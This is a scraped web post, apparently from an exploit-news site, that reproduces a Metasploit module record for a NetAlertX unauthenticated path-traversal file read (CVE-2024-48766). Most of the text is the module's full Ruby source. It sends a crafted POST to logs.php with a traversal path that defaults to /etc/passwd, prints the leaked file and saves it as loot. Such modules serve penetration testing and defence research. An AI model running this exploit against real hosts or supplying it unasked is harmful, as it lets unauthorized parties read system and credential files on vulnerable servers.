{“lastseen”:”2025-08-29T19:25:24″,”description”:”This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log…”,”published”:”2025-08-29T18:53:27″,”modified”:”2025-02-25T18:53:09″,”type”:”metasploit”,”title”:” NetAlertX File Read Vulnerability”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-NETALERTX_FILE_READ-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-46506″,”CVE-2024-48766″],”sourceData”:”class MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Scanner\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘ NetAlertX File Read Vulnerability’,\\n ‘Description’ =\\u003e %q{\\n This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log file and read any file due path traversal vulnerability.\\n },\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-48766’],\\n [‘URL’, ‘https:\/\/rhinosecuritylabs.com\/research\/cve-2024-46506-rce-in-netalertx\/’]\\n ],\\n ‘Author’ =\\u003e [\\n ‘chebuya’, # Vulnerability discovery\\n ‘msutovsky-r7’ # Metasploit module\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-01-30’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(20211),\\n OptString.new(‘FILEPATH’, [true, ‘The path to the file to read’, ‘\/etc\/passwd’]),\\n OptInt.new(‘DEPTH’, [true, ‘Traversal Depth (to reach the root folder)’, 5])\\n ]\\n )\\n end\\n\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘maintenance.php’)\\n })\\n return Exploit::CheckCode::Unknown unless res\\u0026.code == 200\\n\\n html_document = res.get_html_document\\n return Exploit::CheckCode::Unknown(‘Failed to get html document.’) if html_document.blank?\\n\\n version_element = html_document.xpath(‘\/\/div[text()=\\”Installed version\\”]\/\/following-sibling::*’)\\n return Exploit::CheckCode::Unknown(‘Failed to get version element.’) if version_element.blank?\\n\\n version = Rex::Version.new(version_element.text\\u0026.strip\\u0026.sub(\/^v\/, ”))\\n return Exploit::CheckCode::Safe(\\”Version #{version} detected, which is not vulnerable.\\”) unless version.between?(Rex::Version.new(‘24.7.18’), Rex::Version.new(‘24.9.12’))\\n\\n Exploit::CheckCode::Appears(\\”Version #{version} detected.\\”)\\n end\\n\\n def run_host(ip)\\n traversal = ‘..\/’ * datastore[‘DEPTH’]\\n filepath = datastore[‘FILEPATH’]\\n dummyfilename = Rex::Text.rand_text_alphanumeric(6)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(‘\/php\/components\/logs.php’),\\n ‘vars_post’ =\\u003e\\n {\\n ‘items’ =\\u003e %([{\\”buttons\\”:[{\\”labelStringCode\\”:\\”Maint_PurgeLog\\”,\\”event\\”:\\”logManage(app.log, cleanLog)\\”},{\\”labelStringCode\\”:\\”Maint_RestartServer\\”,\\”event\\”:\\”askRestartBackend()\\”}],\\”fileName\\”:\\”#{dummyfilename}\\”,\\”filePath\\”:\\”#{traversal}#{filepath}\\”,\\”textAreaCssClass\\”:\\”logs\\”}])\\n\\n }\\n })\\n\\n fail_with Failure::Unreachable, ‘Connection failed’ unless res\\n fail_with Failure::NotVulnerable, ‘Unexpected response code’ unless res\\u0026.code == 200\\n fail_with Failure::NotVulnerable, ‘Unexpected response’ if res\\u0026.body.blank?\\n\\n html = res.get_html_document\\n\\n fail_with Failure::NotVulnerable, ‘No HTML body’ if html.blank?\\n\\n log_data = html.at(‘textarea’)\\n\\n fail_with Failure::PayloadFailed, ‘No data’ if log_data\\u0026.blank? || log_data\\u0026.text\\u0026.empty?\\n print_status ‘Received data:’\\n print_status log_data.text\\n\\n loot_path = store_loot(\\n ‘netalert.results’,\\n ‘text\/plain’,\\n ip,\\n log_data.text,\\n \\”netalert-#{filepath}.txt\\”,\\n ‘NetAlertX’\\n )\\n print_status \\”Stored results in #{loot_path}\\”\\n report_vuln({\\n host: rhost,\\n port: rport,\\n name: name,\\n refs: references,\\n info: \\”Module #{fullname} successfully leaked file\\”\\n })\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/http\/netalertx_file_read.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/netalertx_file_read\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:25:24″,”description”:”This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log…”,”published”:”2025-08-29T18:53:27″,”modified”:”2025-02-25T18:53:09″,”type”:”metasploit”,”title”:” NetAlertX File Read Vulnerability”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-NETALERTX_FILE_READ-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-46506″,”CVE-2024-48766″],”sourceData”:”class MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-15156","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n